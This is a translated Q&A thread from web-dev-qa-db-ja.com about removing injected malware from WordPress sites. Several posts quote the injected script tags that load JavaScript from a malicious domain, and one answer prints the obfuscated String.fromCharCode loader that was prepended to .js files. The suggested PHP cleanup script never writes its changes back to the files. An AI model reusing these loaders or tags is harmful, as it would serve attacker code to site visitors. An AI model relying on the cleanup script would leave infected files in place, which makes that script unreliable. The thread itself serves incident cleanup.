web-dev-qa-db-ja.com

Linuxで複数のファイルからマルウェア行のテキストを削除する

最近、すべてのWPサイトがすべてのindex.phpファイルにマルウェアを挿入していることに気付きました。問題を特定してパッチを適用しましたが、ファイルからマルウェアリンクを削除できません。私はこのコマンドを試しました:

find . -name "*.php" -exec sed -i 's/<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>><//' {} \;

しかし、エラーが発生します:

find: `-exec 'の引数がありません

だから私は構文エラーがあると思います。この行をすべてのファイルから削除するための正確なコマンドを教えてください。

<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
malware
3
blagoj-357

プラグイン「super-socialat」が存在するかどうかを確認して削除します。これもマルウェアです。このプラグインは、この****マルウェアを含むすべてのサイトで見つかりました。

そして、adminer.phpがサーバーにアップロードされているかどうかを確認してください。サイトをハッキングするのは彼らの管理者のようです:

https://sansec.io/labs/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

1
endcoreCL

同じ問題が発生しました。スクリプトはファイルではなく、データベースにあります。

<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>

より適切な検索と置換プラグインを使用して、プラグインを空白に置き換えます。

0
tudou

同じ問題があります

  1. 127.0.0.1 trasnaltemyrecords.comを/ etc/hostsに追加します

  2. grep -r * 'scripts.trasnaltemyrecords.com' > file_with_scripts.txt

  3. このスクリプトを使用して、この注入を削除します

    $txt_file    = file_get_contents('file_with_scripts.txt');
$rows        = explode("\n", $txt_file);
array_shift($rows);
foreach($rows as $row => $data)
{
    $filename = $data ;
    $file = fopen($filename, 'rw');
    $contents = fread($file, filesize($filename));
    $new_content = preg_replace('/^<script(.*)script>/i', '', $contents);
    echo $new_content;
    fclose($file);
}

Wordpress.orgでこのトピックもACF Checkを使用している場合は、データベースを確認してください。

https://wordpress.org/support/topic/malware-found-injected-script/

0
Sco

wordpressのtemp-crawl.phpが問題の原因です。

サーバーにwpサイトとネイティブphpサイトがあります。疑わしいファイラー再インデックス。*上記のスクリプト行があります。

また、すべての.jsファイルも再感染します。

ルートディレクトリにファイルがあります。wp-craft-report-conf.phpを削除する必要があります。

その後、すべてがうまく機能しているようです。少なくとも今のところ

0
OzdemirEmrah

JSファイルも影響を受けます。

私は走ったfind -type f -mtime -1

そして、このコードがすべての.jsファイルの前に付加されているのを見つけました。

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script');
s.type='text/javascript'; s.async=true; 
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
0
Pietro